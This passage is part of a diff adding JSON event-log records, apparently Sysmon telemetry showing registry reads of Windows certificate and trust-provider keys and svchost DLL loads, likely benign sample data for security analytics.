"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "policymanager.dll", + "image_path": "C:\\Windows\\System32\\policymanager.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877930000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp110_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877930000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 